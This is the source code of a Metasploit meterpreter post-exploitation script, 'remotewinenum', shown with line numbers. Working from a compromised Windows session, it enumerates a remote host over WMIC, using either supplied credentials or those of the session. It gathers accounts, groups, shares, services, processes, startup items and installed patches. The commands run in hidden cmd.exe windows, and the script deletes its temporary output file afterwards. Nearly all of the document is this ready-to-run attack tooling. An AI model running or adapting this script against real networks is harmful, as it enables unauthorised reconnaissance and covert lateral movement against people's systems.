Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8

9
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
10
#-------------------------------------------------------------------------------
11
################## Variable Declarations ##################
12
session = client
13
# Variables for Options
14
helpcall = 0
15
rusr = nil
16
rpass = nil
17
trg = ""
18
# Script Options
19
@@exec_opts = Rex::Parser::Arguments.new(
20
  "-h"  => [ false,  "Help menu."],
21
  "-t"  => [ true,  "The target address"],
22
  "-u"  => [ true,  "User on the target system (If not provided it will use credential of process)"],
23
  "-p"  => [ true,  "Password of user on target system"]
24
)
25

26
# Create Filename info to be appended to downloaded files
27
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
28

29
# Create a directory for the logs
30
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'remotewinenum')
31

32
# Create the log directory
33
::FileUtils.mkdir_p(logs)
34

35
# WMIC Commands that will be executed on the Target
36
wmic = [
37
  'environment list',
38
  'share list',
39
  'nicconfig list',
40
  'computersystem list',
41
  'useraccount list',
42
  'group list',
43
  'sysaccount list',
44
  'volume list brief',
45
  'logicaldisk get description,filesystem,name,size',
46
  'netlogin get name,lastlogon,badpasswordcount',
47
  'netclient list brief',
48
  'netuse get name,username,connectiontype,localname',
49
  'share get name,path',
50
  'nteventlog get path,filename,writeable',
51
  'service list brief',
52
  'process list brief',
53
  'startup list full',
54
  'rdtoggle list',
55
  'product get name,version',
56
  'qfe list'
57
]
58
################## Function Declarations ##################
59

60
# Function for running a list of WMIC commands stored in a array, returns string
61
def wmicexec(session,wmic,user,pass,trgt)
62
  print_status("Running WMIC Commands ....")
63
  tmpout = ''
64
  command = nil
65
  runfail = 0
66
  runningas = session.sys.config.getuid
67
  begin
68
    tmp = session.sys.config.getenv('TEMP')
69
    # Temporary file on windows host to store results
70
    wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
71

72
    wmic.each do |wmi|
73
      if user == nil
74
        print_status("The commands will be ran under the credentials of #{runningas}")
75
        command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
76
      else
77
        command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
78
      end
79
      print_status "\trunning command wimic #{wmi}"
80
      r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
81
      sleep(1)
82
      r = session.sys.process.execute("cmd.exe /c echo      Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
83
      sleep(1)
84
      r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
85
      sleep(1)
86
      #print_status "\twmic #{command}"
87
      r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
88
      #Making sure that wmic finishes before executing next wmic command
89
      prog2check = "wmic.exe"
90
      found = 0
91
      sleep(2)
92
      while found == 0
93
        session.sys.process.get_processes().each do |x|
94
          found =1
95
          if prog2check == (x['name'].downcase)
96
            sleep(0.5)
97
            found = 0
98
          end
99
        end
100
      end
101
      r.close
102
    end
103
    # Read the output file of the wmic commands
104
    wmioutfile = session.fs.file.new(wmicfl, "rb")
105
    until wmioutfile.eof?
106
      tmpout << wmioutfile.read
107
    end
108
    # Close output file in host
109
    wmioutfile.close
110
  rescue ::Exception => e
111
    print_status("Error running WMIC commands: #{e.class} #{e}")
112
  end
113
  # We delete the file with the wmic command output.
114
  c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
115
  c.close
116
  tmpout
117
end
118

119
#------------------------------------------------------------------------------
120
# Function to generate report header
121
def headerbuid(session,target,dest)
122
  # Header for File that will hold all the output of the commands
123
  info = session.sys.config.sysinfo
124
  header =  "Date:       #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
125
  header << "Running as: #{client.sys.config.getuid}\n"
126
  header << "From:       #{info['Computer']}\n"
127
  header << "OS:         #{info['OS']}\n"
128
  header << "Target:     #{target}\n"
129
  header << "\n\n\n"
130

131
  print_status("Saving report to #{dest}")
132
  header
133

134
end
135

136
#------------------------------------------------------------------------------
137
# Function Help Message
138
def helpmsg
139
  print("Remote Windows Enumeration Meterpreter Script\n" +
140
    "This script will enumerate windows hosts in the target environment\n" +
141
    "given a username and password or using the credential under witch\n" +
142
    "Meterpreter is running using WMI wmic windows native tool.\n" +
143
    "Usage:\n" +
144
    @@exec_opts.usage)
145
end
146
################## MAIN ##################
147
if client.platform == 'windows'
148
  localos = session.sys.config.sysinfo
149

150
  # Check that the command is not being ran on a Win2k host
151
  # since wmic is not present in Windows 2000
152
  if localos =~ /(Windows 2000)/
153
    print_status("This script is not supported to be ran from Windows 2000 servers!!!")
154
  else
155
    # Parsing of Options
156
    @@exec_opts.parse(args) { |opt, idx, val|
157
      case opt
158

159
      when "-t"
160
        trg = val
161
      when "-u"
162
        rusr = val
163
      when "-p"
164
        rpass = val
165
      when "-h"
166
        helpmsg
167
        helpcall = 1
168
      end
169

170
    }
171
    #logfile name
172
    dest = logs + "/" + trg + filenameinfo
173
    # Executing main logic of the script
174
    if helpcall == 0 and trg != ""
175

176
      # Making sure that is running as System a Username and Password for target machine must be provided
177

178
      if is_system? && rusr == nil && rpass == nil
179

180
        print_status("Stopped: Running as System and no user provided for connecting to target!!")
181

182
      else trg != nil && helpcall != 1
183

184
        file_local_write(dest,headerbuid(session,trg,dest))
185
        file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))
186

187
      end
188
    elsif helpcall == 0 and trg == ""
189

190
      helpmsg
191
    end
192
  end
193
else
194
  print_error("This version of Meterpreter is not supported with this Script!")
195
  raise Rex::Script::Completed
196
end
197

198